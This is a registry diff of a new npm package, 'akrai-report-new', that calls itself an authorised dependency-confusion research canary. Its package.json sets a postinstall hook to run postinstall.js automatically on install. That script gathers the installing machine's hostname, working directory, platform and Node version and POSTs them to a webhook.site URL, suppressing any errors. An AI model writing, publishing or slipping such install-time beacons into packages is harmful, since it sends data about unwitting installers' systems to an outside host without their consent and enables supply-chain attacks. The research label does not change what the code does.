akrai-report-new 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +2 -0
- package/index.js +2 -0
- package/package.json +16 -0
- package/postinstall.js +16 -0
package/README.md
ADDED
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
{
|
|
2
|
+
"version": "1.0.0",
|
|
3
|
+
"license": "MIT",
|
|
4
|
+
"keywords": [
|
|
5
|
+
"security-research",
|
|
6
|
+
"dependency-confusion-canary",
|
|
7
|
+
"authorized-pentest"
|
|
8
|
+
],
|
|
9
|
+
"scripts": {
|
|
10
|
+
"postinstall": "node postinstall.js"
|
|
11
|
+
},
|
|
12
|
+
"name": "akrai-report-new",
|
|
13
|
+
"description": "AUTHORIZED SECURITY RESEARCH CANARY — not MarkScan. Contact farouqsa@proton.me Token PATHC-CANARY-2026",
|
|
14
|
+
"author": "farouqsa@proton.me",
|
|
15
|
+
"main": "index.js"
|
|
16
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,16 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
const payload = JSON.stringify({
|
|
3
|
+
canary: 'akrai-report-new',
|
|
4
|
+
token: 'PATHC-CANARY-2026',
|
|
5
|
+
event: 'npm-postinstall',
|
|
6
|
+
time_utc: new Date().toISOString(),
|
|
7
|
+
node: process.version,
|
|
8
|
+
cwd: process.cwd(),
|
|
9
|
+
platform: process.platform,
|
|
10
|
+
hostname: require('os').hostname(),
|
|
11
|
+
});
|
|
12
|
+
const url = new URL('https://webhook.site/129cb2ee-ba08-4b3c-989c-270dc0030350');
|
|
13
|
+
const req = https.request({ hostname: url.hostname, path: url.pathname, method: 'POST', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }, timeout: 5000 }, () => {});
|
|
14
|
+
req.on('error', () => {});
|
|
15
|
+
req.write(payload); req.end();
|
|
16
|
+
console.error('[pathc-canary] npm beacon queued');
|